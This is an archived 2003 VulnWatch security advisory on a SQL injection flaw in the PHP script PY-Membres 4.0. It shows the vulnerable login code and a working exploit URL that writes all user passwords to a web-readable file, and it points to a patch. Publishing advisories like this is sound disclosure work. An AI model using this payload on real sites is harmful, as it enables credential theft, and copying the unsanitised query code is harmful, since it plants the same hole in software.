[VulnWatch] PY-Membres 4.0 (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 04/06/03

  • Next message: Marc Schoenefeld: "[VulnWatch] Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: vulnwatch@vulnwatch.org
    Date: Sun, 06 Apr 2003 20:16:25 +0200
    
    

    Informations :
    같같같같같같같
    Website : http://www.py-scripts.com/
    Tested version : 4.0
    PHP Config : magic_quotes_gpc=OFF
    Problem : SQL Injection

    PHP Code/Location :
    같같같같같같같같같

    login.php :

    ------------------------------------------------------------------------
    <?
    session_start();
    session_name("pys");
    include("config.php");
    include("functions.php");

    est_vide($login,"Vous n\'avez pas saisi de login !");
    est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
    connexiondb();
    $sql = "SELECT passwd FROM $db_table WHERE login='$login'";
    $req = mysql_query($sql) or die('Erreur SQL
    !<br>'.$sql.'<br>'.mysql_error());
    $data = mysql_fetch_array($req);
    if($data['passwd'] != $pass)
            {
            echo "<p>Mauvais login / password. Merci de recommencer</p>";
            mysql_close();
            exit;
            }
    else
            {
            $ploginy=$login;
            session_register('ploginy');
            $ip=$REMOTE_ADDR;
            $host=gethostbyaddr($ip);
            $log=date("d/m/Y H\hi | ");
            $log.=$ip." | ".$host;
            $action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE
    login='$ploginy'") or die (mysql_error()) ;
            mysql_close();
            Header("Location: membre.php");
            }
    ?>
    ------------------------------------------------------------------------

    Exploit :
    같같같같
    http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1

    will save all users passwords into the file http://[target]/file.txt.

    Solution :
    같같같같같
    A patch can be found on http://www.phpsecure.info.

    More Details In French :
    같같같같같같같같같같같같

    http://www.frog-man.org/tutos/PY-Membres4.0.txt

    frog-m@n

    _________________________________________________________________


  • Next message: Marc Schoenefeld: "[VulnWatch] Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)"

    Relevant Pages

    • Re: database server audit tools
      ... This thing was pretty limited last time I looked at it, and had no database audit capabilities. ... this is a nice SQL injection testing tool. ... >Audit your website security with Acunetix Web Vulnerability Scanner: ... Cross site scripting and other web attacks before hackers do! ...
      (Pen-Test)
    • Re: sql injection: url or form based?
      ... start putting your SQL injection magic in the input boxes to ... Hackers are concentrating their efforts on attacking applications ... Check your website for vulnerabilities to SQL injection, ... Cross site scripting and other web attacks before hackers do! ...
      (Pen-Test)
    • RE: MS SQL, find list of tables
      ... I'm doing a pen test on a IIS/MS SQL box and find a SQL Injection on it ... Audit your website security with Acunetix Web Vulnerability Scanner: ... Hackers are concentrating their efforts on attacking applications on your ... Up to 75% of cyber attacks are launched on shopping carts, forms, ...
      (Pen-Test)
    • Re: sql injection: url or form based?
      ... start putting your SQL injection magic in the input boxes to ... Audit your website security with Acunetix Web Vulnerability Scanner: ... Cross site scripting and other web attacks before hackers do! ...
      (Pen-Test)
    • RE: Scripts found on web server
      ... Are the .asp scripts valid and used on the website for auth? ... SQL injection on it and see what you get. ... I was doing a penetration testing on one of our client's website, ... Up to 75% of cyber attacks are launched on shopping carts, ...
      (Pen-Test)